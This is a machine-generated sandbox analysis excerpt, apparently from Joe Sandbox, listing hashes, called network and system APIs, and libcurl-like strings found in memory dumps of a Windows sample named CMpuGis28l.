                                                        • Opcode Fuzzy Hash: f7bdccd34e07be561def30eb58696b39a0b9769937fe945f04958f5c914402bc
                                                        • Instruction Fuzzy Hash: 91117270808785D9EB268F5CD8027E6B3F8AFC0329F109618E5D942150F73656C58BC2
                                                        APIs
                                                        • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0103A97E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: send
                                                        • String ID:
                                                        • API String ID: 2809346765-0
                                                        • Opcode ID: cad611bfd2ef572ab3c1cc07cc6a81a4bcef53c45f469f6522212ff6f8242be9
                                                        • Instruction ID: 3dcc619f9c00cb6bd7f9f2f56f7696a44003b444408f1ce0e4511ce52293801c
                                                        • Opcode Fuzzy Hash: cad611bfd2ef572ab3c1cc07cc6a81a4bcef53c45f469f6522212ff6f8242be9
                                                        • Instruction Fuzzy Hash: 7801A7757117109FD7148F18DC45B56FBA9EFC4720F068559EAD46B361C331AC108BD1
                                                        APIs
                                                        • socket.WS2_32(?,0103B280,00000000,-00000001,00000000,0103B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0103AF67
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: socket
                                                        • String ID:
                                                        • API String ID: 98920635-0
                                                        • Opcode ID: f7028b6850aa8965a208f5a92ef10abb6109f6bea7a57f3e94ea236043d91b75
                                                        • Instruction ID: 7c20f78b70a003606f7d2fe2d45ec97af40dece39fe7be36fd61cf9294b39da7
                                                        • Opcode Fuzzy Hash: f7028b6850aa8965a208f5a92ef10abb6109f6bea7a57f3e94ea236043d91b75
                                                        • Instruction Fuzzy Hash: 85E06DB2A08221AFD650CF4CE8409ABF7ADEFC4B20F055A49B99463204C330AC408BE1
                                                        APIs
                                                        • closesocket.WS2_32(?,01039422,?,?,?,?,?,?,?,?,?,?,?,01023377,013F9520,00000000), ref: 0103B04D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: closesocket
                                                        • String ID:
                                                        • API String ID: 2781271927-0
                                                        • Opcode ID: fa8c2e1359c976817b90bdeefa8b8fd968200f23a4ce70f6b479588d9ff1eecb
                                                        • Instruction ID: ca0c590460ab7c6fea2525c7eb623636a2ab4aba54cf861a7493288902e29f72
                                                        • Opcode Fuzzy Hash: fa8c2e1359c976817b90bdeefa8b8fd968200f23a4ce70f6b479588d9ff1eecb
                                                        • Instruction Fuzzy Hash: 2BD0C23470020157DA608A19C884A57BAAF7FC1614FA8CBA8F26C4A190C73BC8438A01
                                                        APIs
                                                        • ioctlsocket.WS2_32(?,8004667E,?,?,00FAAF56,?,00000001), ref: 00FD67FB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: ioctlsocket
                                                        • String ID:
                                                        • API String ID: 3577187118-0
                                                        • Opcode ID: 39779ecba55f040b81d483daf55838ed411ca01e5045570c9a123f6e27198e64
                                                        • Instruction ID: 387d8c70313301b91aa01064df8971ae75ad28fc5ce7f0a26273175db567947c
                                                        • Opcode Fuzzy Hash: 39779ecba55f040b81d483daf55838ed411ca01e5045570c9a123f6e27198e64
                                                        • Instruction Fuzzy Hash: D7C012F1109200AFC60C4724DC55B2EB6D8DB44255F01591CB04692180EB349450CA16
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: af15bd69556bd8166bb28b056b27ebe883e6f1fc21e4fdd2184959b90902f01a
                                                        • Instruction ID: 250a89caa4155c3098c8fc64dda3b611584b8bce3b679820e9cd197ab3a676f3
                                                        • Opcode Fuzzy Hash: af15bd69556bd8166bb28b056b27ebe883e6f1fc21e4fdd2184959b90902f01a
                                                        • Instruction Fuzzy Hash: 7A31B5B0904305DBCB50EFB8D98469EBBF0BF44348F01886EE898A7341E7349A44DF52
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 4e0f78d8b5c49656cdc8c8722fa346db2e7006baf8b5e22a977008957ca65778
                                                        • Instruction ID: e71c30ce1574668eaf7fc3b0ca1f01a78c499e5d6c521b07964dce2e3452ae89
                                                        • Opcode Fuzzy Hash: 4e0f78d8b5c49656cdc8c8722fa346db2e7006baf8b5e22a977008957ca65778
                                                        • Instruction Fuzzy Hash: B8C04CE0C5474446D740BE38C54A11E79E47B41104FC11B68DD84A6195F628931C8697
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                        • API String ID: 0-122532811
                                                        • Opcode ID: 06ecf094f1374101bfe30b35a4e63a9a5d72b82ad9ffe76e459a56434a81f88c
                                                        • Instruction ID: cfb104601099a6b6a118ad6f480cb3c565bf19d851cd17da239c8751dc8f6343
                                                        • Opcode Fuzzy Hash: 06ecf094f1374101bfe30b35a4e63a9a5d72b82ad9ffe76e459a56434a81f88c
                                                        • Instruction Fuzzy Hash: 8F42F871B08701AFD708DE28CC51BABB6EAFBC4704F048A2DF54D97291E775B9049B92
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: localeconv
                                                        • String ID: $d$nil)
                                                        • API String ID: 3737801528-394766432
                                                        • Opcode ID: 0f1d060fed304afe4cc4861cf3c077cf68bad963797917e823eb87d115020ed9
                                                        • Instruction ID: ce9b1351143acd71dd59b338ced9939fa968abd91be860be625099d07ae78c1a
                                                        • Opcode Fuzzy Hash: 0f1d060fed304afe4cc4861cf3c077cf68bad963797917e823eb87d115020ed9
                                                        • Instruction Fuzzy Hash: 29137A716183428FD722CF28C19072AFBE1BF89354F16492DEB959B3A1D771E845CB82
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                        • API String ID: 0-2555271450
                                                        • Opcode ID: 751f03cfbf75d4ef7fd2ebf6a42b61b24e82d9f64097f059e632d60ea63329f7
                                                        • Instruction ID: d5097420342dc5fa916b5d66226cfe0427c93d629400db2fc8d39c5803ca0000
                                                        • Opcode Fuzzy Hash: 751f03cfbf75d4ef7fd2ebf6a42b61b24e82d9f64097f059e632d60ea63329f7
                                                        • Instruction Fuzzy Hash: 79C26B31A083418FD714CF28C49076AB7E2AFC9324F15CA2EE89D9B355D774ED459B82
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                        • API String ID: 0-2555271450
                                                        • Opcode ID: 1b0222e3adbda5c2115607b87b930ca657a86600af6e642e419e557b55580bbd
                                                        • Instruction ID: bcd4320f7592935605cb9faf967186b9db7fa0e9edb5353cb5bef3c10647c053
                                                        • Opcode Fuzzy Hash: 1b0222e3adbda5c2115607b87b930ca657a86600af6e642e419e557b55580bbd
                                                        • Instruction Fuzzy Hash: 5A825E71A083419FD714CE28C88072BBBE1AFD9724F14CA6EE9AD97291D770DC499B43
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: default$login$macdef$machine$netrc.c$password
                                                        • API String ID: 0-1043775505
                                                        • Opcode ID: e174dd132b1bb3487cb6207b18aa3e0ab8dd2d6713724670eee0871034dfd32e
                                                        • Instruction ID: 3a2d18fb5b6ccd78b3def6cb3f5b2f3b35171f93b6f3675b7f4b72de1af0b876
                                                        • Opcode Fuzzy Hash: e174dd132b1bb3487cb6207b18aa3e0ab8dd2d6713724670eee0871034dfd32e
                                                        • Instruction Fuzzy Hash: 28E136719083419BE3109F24D84576BBBD5AF85318F1C482EF885DB382E7B9D948FB92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                                        • API String ID: 0-4201740241
                                                        • Opcode ID: 2f2da8a29fe52a9d801a0e979fa57de707a2bd55cf3e9ce47b7066cc8812b93c
                                                        • Instruction ID: 273b29e601fdd144c4437044e1a6241dd26e63a67cf0ee2363b7ef3a53573ee5
                                                        • Opcode Fuzzy Hash: 2f2da8a29fe52a9d801a0e979fa57de707a2bd55cf3e9ce47b7066cc8812b93c
                                                        • Instruction Fuzzy Hash: C262F3B0914741DBD714DF20C8907AAB3E5FF58304F04962EE88D8B352E774EA94CB96
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                                        • API String ID: 0-3285806060
                                                        • Opcode ID: e999315053ada3a8a3235ca58dd0b9cc48f88247813c58d18d4c131f21208bf0
                                                        • Instruction ID: f1e504c93aed702a9eb43f79af0081daff400c1314aa83731206e3dc4e4aeca0
                                                        • Opcode Fuzzy Hash: e999315053ada3a8a3235ca58dd0b9cc48f88247813c58d18d4c131f21208bf0
                                                        • Instruction Fuzzy Hash: 7FD11A72A083658BF725EF2CCA8037EBBD1AF91304F14496DE9C59B281EB749944D783
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .12$M 0.$NT L
                                                        • API String ID: 0-1919902838
                                                        • Opcode ID: 0537b9fcce41defdcf47f17fa1919255543a624217107b3c06e92b31c810300c
                                                        • Instruction ID: 18ba13c22605a7f2c3be94fc66ee8657a29cfb9f9afdf921c8f7543b43d5ada5
                                                        • Opcode Fuzzy Hash: 0537b9fcce41defdcf47f17fa1919255543a624217107b3c06e92b31c810300c
                                                        • Instruction Fuzzy Hash: 1C51E474A00341DBDB11DF20C8847AA77F5BF45314F18866AEC489F352E379DA84EB9A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: H$xn--
                                                        • API String ID: 0-4022323365
                                                        • Opcode ID: d51e05531f92c5b6e62626cdcaf53889f7330b644f1c8414f745d68131d8ed17
                                                        • Instruction ID: cae755dbdbd427b6dadd83b3598a5f42e1afe024dbc0611991de9258c0217d2c
                                                        • Opcode Fuzzy Hash: d51e05531f92c5b6e62626cdcaf53889f7330b644f1c8414f745d68131d8ed17
                                                        • Instruction Fuzzy Hash: 9FE12931A283964BD718EE2CD8D072BF7D2ABC4214F188A3DDB96873D1E7B499058742
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
Similarity
• API ID:
• String ID: H
• API String ID: 0-2852464175
• Opcode ID: 369cb9bfc6bae7a8e9b570f988313c60bf9fa3cde68ec34c5703b8aae4970e19
• Instruction ID: 59fc1668e37c68b4445bac2955218401f3db482c9fd2bbdaff74b4c84c59c60e
• Opcode Fuzzy Hash: 369cb9bfc6bae7a8e9b570f988313c60bf9fa3cde68ec34c5703b8aae4970e19
• Instruction Fuzzy Hash: 2291C671B083118FC719CE1CC4D01AEB7E3ABC9314F1A857DEAD6A7395DA31AC468B85
Memory Dump Source
• Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bb0742c4c43d93d6f98df21c5eb6f2a6e5ce5f6231910809b2f9eeca96cfc480
• Instruction ID: 0432416cbd964edef954bf341f4e118ca19818612a7c11614f4ab3122f7a754f
• Opcode Fuzzy Hash: bb0742c4c43d93d6f98df21c5eb6f2a6e5ce5f6231910809b2f9eeca96cfc480
• Instruction Fuzzy Hash: A6C1C075614B428FD324DF29C4A0A2BBBE1FF85710F148A2DE6EA87791D730E849CB41
Memory Dump Source
• Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 020bd43a5de1b12b78b9ed8c8f9422a8ec9fdcc5fcee70a7b9dc9ab9ea3ce3d4
• Instruction ID: 695e20f9bfd8eccb7c45fcd0e956f79a74274979df9167d596c62c614c00bd78
• Opcode Fuzzy Hash: 020bd43a5de1b12b78b9ed8c8f9422a8ec9fdcc5fcee70a7b9dc9ab9ea3ce3d4
• Instruction Fuzzy Hash: E7A105B1B083014FD714CE2CC4C06AABBE6AFC9350F19867DF6D5A7396E634D8458B82
Memory Dump Source
• Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a1c8635c48d521dcab9182743159e334c974571effb5bcfed36ba56004c7dfb4
• Instruction ID: 2e42e7811b61e672c74f916fd97c410cfff507778b06b915b1d411d249b0b3d7
• Opcode Fuzzy Hash: a1c8635c48d521dcab9182743159e334c974571effb5bcfed36ba56004c7dfb4
• Instruction Fuzzy Hash: 36A1A435A005598FEB38DE28CD41FDA73E6EBC8314F0A8665DD59EF391EA30AD458780
Memory Dump Source
• Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 77fb6b5839f4b27b2cc0de7a76fe9ee0fcfa257e667b1f2ef756ec1c5a37e2ec
• Instruction ID: e4aa4a3a8d183e7404665700bb746c07fc4e0fa8c2e819ceed08bd8804668333
• Opcode Fuzzy Hash: 77fb6b5839f4b27b2cc0de7a76fe9ee0fcfa257e667b1f2ef756ec1c5a37e2ec
• Instruction Fuzzy Hash: 62C10971914B418BE362CF38C941BE6F7E5BFD9300F109A1EE5EAA6241EB707584CB51
Memory Dump Source
• Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fe607d05944d72bed57fd6595b9237e21a87d11eb2b6f2cf2d112af2a805d552
• Instruction ID: 82e2e531fcd477efa71376362bd6ce6cd93a78fab23fecffaf4eaacef00af917
• Opcode Fuzzy Hash: fe607d05944d72bed57fd6595b9237e21a87d11eb2b6f2cf2d112af2a805d552
• Instruction Fuzzy Hash: 0981FA72D24B828BD3158F68C8916B6B7A0FFDA314F249B1EE9E607743E7749580C781
Memory Dump Source
• Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
• Instruction ID: 982c508680da3207764b4130396f7f8d827dbad51452534f1945b46b555b5403
• Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
• Instruction Fuzzy Hash: AAF0C233B7123A0BA360CDBA6C001EBA2C3B3D4270F1F89A5DC44D7902E934CC4686C6
Memory Dump Source
• Source File: 00000000.00000003.2522201658.0000000001CFD000.00000004.00000020.00020000.00000000.sdmp, Offset: 01CFD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1cf0000_CMpuGis28l.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d5a3f7c2ac11c1695abf937ed2721680e5fa19f2c72b43b9234e45bf4bbe5758
• Instruction ID: 8699994e4c09b7169d4898d8546c02cf7c38a1427cbccc647debab04cffbde05
• Opcode Fuzzy Hash: d5a3f7c2ac11c1695abf937ed2721680e5fa19f2c72b43b9234e45bf4bbe5758
• Instruction Fuzzy Hash: 92D0011100E3C00EC30BA7605D39BA42FB0AF83204F0F41E7D089CE0E3DA080A28D322
Memory Dump Source
• Source File: 00000000.00000003.2522201658.0000000001CFD000.00000004.00000020.00020000.00000000.sdmp, Offset: 01CFE000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1cf0000_CMpuGis28l.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d5a3f7c2ac11c1695abf937ed2721680e5fa19f2c72b43b9234e45bf4bbe5758
• Instruction ID: 8699994e4c09b7169d4898d8546c02cf7c38a1427cbccc647debab04cffbde05
• Opcode Fuzzy Hash: d5a3f7c2ac11c1695abf937ed2721680e5fa19f2c72b43b9234e45bf4bbe5758
• Instruction Fuzzy Hash: 92D0011100E3C00EC30BA7605D39BA42FB0AF83204F0F41E7D089CE0E3DA080A28D322
Memory Dump Source
• Source File: 00000000.00000003.2522201658.0000000001CFD000.00000004.00000020.00020000.00000000.sdmp, Offset: 01CF0000, based on PE: false
• Associated: 00000000.00000003.2522167712.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1cf0000_CMpuGis28l.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d5a3f7c2ac11c1695abf937ed2721680e5fa19f2c72b43b9234e45bf4bbe5758
• Instruction ID: 8699994e4c09b7169d4898d8546c02cf7c38a1427cbccc647debab04cffbde05
• Opcode Fuzzy Hash: d5a3f7c2ac11c1695abf937ed2721680e5fa19f2c72b43b9234e45bf4bbe5758
• Instruction Fuzzy Hash: 92D0011100E3C00EC30BA7605D39BA42FB0AF83204F0F41E7D089CE0E3DA080A28D322
Strings
Memory Dump Source
• Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
Similarity
• API ID:
• String ID: [
• API String ID: 0-784033777
• Opcode ID: e400af4fd4a76bf3d13d1af7734cf46d80a4ff9e3e1d165a5d57f8f50e032e81
• Instruction ID: bf569e368333cc24a0702b8c1d82eff8d578a5736a7a34ee2a6680d4e29bece1
• Opcode Fuzzy Hash: e400af4fd4a76bf3d13d1af7734cf46d80a4ff9e3e1d165a5d57f8f50e032e81
• Instruction Fuzzy Hash: A4B15772D183816BDB359A24C89073ABBDAEF95328F1C052FE8C5C6381E739D844B752